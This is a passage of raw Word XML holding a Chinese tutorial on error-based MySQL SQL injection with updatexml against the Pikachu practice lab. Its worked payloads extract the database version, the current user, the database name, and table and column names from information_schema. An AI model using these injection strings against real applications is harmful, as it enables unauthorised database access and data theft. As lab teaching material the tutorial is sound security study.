          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A97B6" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRDefault="002C14F3" w:rsidP="009F351B">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updatexml（）:函数是MYSQL对XML文档数据进行查询和修改的XPATH函数.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  extractvalue（） :函数也是MYSQL对XML文档数据进行查询的XPATH函数.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  floor（）:MYSQL中用来取整的函数.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7AEC6C" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002C14F3" w:rsidRDefault="002C14F3" w:rsidP="009F351B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>四、基于报错的信息获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCB3C5" w14:textId="77777777" w:rsidR="009F351B" w:rsidRPr="009F351B" w:rsidRDefault="009F351B" w:rsidP="009F351B">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9F351B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UPDATEXML (XML_document, XPath_string, new_value); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B193973" w14:textId="77777777" w:rsidR="009F351B" w:rsidRPr="009F351B" w:rsidRDefault="009F351B" w:rsidP="009F351B">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9F351B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDC30C" w14:textId="77777777" w:rsidR="009F351B" w:rsidRPr="009F351B" w:rsidRDefault="009F351B" w:rsidP="009F351B">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9F351B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F08E21" w14:textId="77777777" w:rsidR="009F351B" w:rsidRPr="009F351B" w:rsidRDefault="009F351B" w:rsidP="009F351B">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9F351B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第三个参数：new_value，String格式，替换查找到的符合条件的数据 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628981F8" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRPr="002C14F3" w:rsidRDefault="002C14F3" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>五、实战测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BFC35" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆数据库版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17536D" w14:textId="77777777" w:rsidR="000F0D53" w:rsidRDefault="000F0D53"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 xml:space="preserve">k' </w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE82BBB" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="001725AE" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆数据库当前</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E26212" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002C14F3" w:rsidRDefault="000F0D53"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 xml:space="preserve">k' </w:t>
      </w:r>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD95523" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidR="001725AE" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3D848" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002C14F3" w:rsidRDefault="000F0D53"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 xml:space="preserve">k' </w:t>
      </w:r>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</w:t>
      </w:r>
      <w:r w:rsidRPr="000F0D53">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD47AD" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3AC10" w14:textId="77777777" w:rsidR="00C67631" w:rsidRPr="00C67631" w:rsidRDefault="00C67631" w:rsidP="00C67631">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C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取数据库表名，输入：k'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#，但是反馈回的错误表示只能显示一行，所以采用limit来一行一行显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CB129" w14:textId="77777777" w:rsidR="00C67631" w:rsidRDefault="00C67631"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noProof/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A8DFE6" wp14:editId="2DA23693">
            <wp:extent cx="5278120" cy="1711926"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="1711926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F55972" w14:textId="77777777" w:rsidR="00C67631" w:rsidRPr="00C67631" w:rsidRDefault="00C67631" w:rsidP="00C67631">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C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入k' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu'limit 0,1)),0)#更改limit后面的数字limit 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
      <w:r w:rsidR="00BD0A57">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>遍历。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375454E" w14:textId="77777777" w:rsidR="00C67631" w:rsidRDefault="00C67631" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43146BD6" wp14:editId="0179C0B2">
            <wp:extent cx="5278120" cy="898367"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="898367"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0817A" w14:textId="77777777" w:rsidR="00C67631" w:rsidRDefault="00C67631" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A3EB62" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5、</w:t>
      </w:r>
      <w:r w:rsidR="002C14F3" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089BBB5" w14:textId="77777777" w:rsidR="004254B6" w:rsidRDefault="001725AE"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C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>名，输入：</w:t>
      </w:r>
      <w:r w:rsidR="004254B6" w:rsidRPr="004254B6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">k' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit </w:t>
      </w:r>
      <w:r w:rsidR="004254B6" w:rsidRPr="001725AE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004254B6" w:rsidRPr="004254B6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,1)),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF2F5ED" w14:textId="77777777" w:rsidR="004254B6" w:rsidRDefault="004254B6"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noProof/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E218DF" wp14:editId="1AE1034C">
            <wp:extent cx="5278120" cy="665543"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="665543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D189F1" w14:textId="77777777" w:rsidR="004254B6" w:rsidRPr="002445C4" w:rsidRDefault="002445C4" w:rsidP="004254B6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
